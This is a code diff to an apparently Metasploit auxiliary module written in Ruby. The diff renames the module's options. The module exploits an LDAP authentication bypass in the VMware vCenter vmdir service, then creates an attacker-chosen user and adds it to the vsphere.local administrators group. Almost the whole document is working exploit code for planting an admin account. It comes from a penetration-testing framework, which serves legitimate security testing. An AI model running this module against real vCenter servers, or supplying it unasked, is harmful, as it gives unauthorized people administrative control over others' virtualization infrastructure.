@@ -55,17 +55,17 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       Opt::RPORT(636), # SSL/TLS
       OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),
-      OptString.new('USERNAME', [false, 'Username of admin user to add']),
-      OptString.new('PASSWORD', [false, 'Password of admin user to add'])
+      OptString.new('NEW_USERNAME', [false, 'Username of admin user to add']),
+      OptString.new('NEW_PASSWORD', [false, 'Password of admin user to add'])
     ])
   end
 
-  def username
-    datastore['USERNAME']
+  def new_username
+    datastore['NEW_USERNAME']
   end
 
-  def password
-    datastore['PASSWORD']
+  def new_password
+    datastore['NEW_PASSWORD']
   end
 
   def base_dn
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def user_dn
-    "cn=#{username},cn=Users,#{base_dn}"
+    "cn=#{new_username},cn=Users,#{base_dn}"
   end
 
   def group_dn
@@ -81,8 +81,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    unless username && password
-      print_error('Please set the USERNAME and PASSWORD options to proceed')
+    unless new_username && new_password
+      print_error('Please set the NEW_USERNAME and NEW_PASSWORD options to proceed')
       return
     end
 
@@ -102,10 +102,10 @@ class MetasploitModule < Msf::Auxiliary
       print_status("Bypassing LDAP auth in vmdir service at #{peer}")
       auth_bypass(ldap)
 
-      print_status("Adding admin user #{username} with password #{password}")
+      print_status("Adding admin user #{new_username} with password #{new_password}")
 
       unless add_admin(ldap)
-        print_error("Failed to add admin user #{username}")
+        print_error("Failed to add admin user #{new_username}")
       end
     end
   rescue Net::LDAP::Error => e
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
   def auth_bypass(ldap)
     # when datastore['BIND_DN'] has been provided in options,
     # ldap_connect has already made a bind for us.
-    return if datastore['BIND_DN']
+    return if datastore['USERNAME'] && ldap.bind
 
     ldap.bind(
       method: :simple,
@@ -128,13 +128,13 @@ class MetasploitModule < Msf::Auxiliary
   def add_admin(ldap)
     user_info = {
       'objectClass' => %w[top person organizationalPerson user],
-      'cn' => username,
+      'cn' => new_username,
       'sn' => 'vsphere.local',
-      'givenName' => username,
-      'sAMAccountName' => username,
-      'userPrincipalName' => "#{username}@VSPHERE.LOCAL",
-      'uid' => username,
-      'userPassword' => password
+      'givenName' => new_username,
+      'sAMAccountName' => new_username,
+      'userPrincipalName' => "#{new_username}@VSPHERE.LOCAL",
+      'uid' => new_username,
+      'userPassword' => new_password
     }
 
     # Add our new user
@@ -145,9 +145,9 @@ class MetasploitModule < Msf::Auxiliary
       when Net::LDAP::ResultCodeInsufficientAccessRights
         print_error('Failed to bypass LDAP auth in vmdir service')
       when Net::LDAP::ResultCodeEntryAlreadyExists
-        print_error("User #{username} already exists")
+        print_error("User #{new_username} already exists")
       when Net::LDAP::ResultCodeConstraintViolation
-        print_error("Password #{password} does not meet policy requirements")
+        print_error("Password #{new_password} does not meet policy requirements")
       else
         print_error("#{res.message}: #{res.error_message}")
       end
@@ -155,14 +155,14 @@ class MetasploitModule < Msf::Auxiliary
       return false
     end
 
-    print_good("Added user #{username}, so auth bypass was successful!")
+    print_good("Added user #{new_username}, so auth bypass was successful!")
 
     # Add our user to the admin group
     unless ldap.add_attribute(group_dn, 'member', user_dn)
       res = ldap.get_operation_result
 
       if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
-        print_error("User #{username} is already an admin")
+        print_error("User #{new_username} is already an admin")
       else
         print_error("#{res.message}: #{res.error_message}")
       end
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary
       return false
     end
 
-    print_good("Added user #{username} to admin group")
+    print_good("Added user #{new_username} to admin group")
 
     true
   end
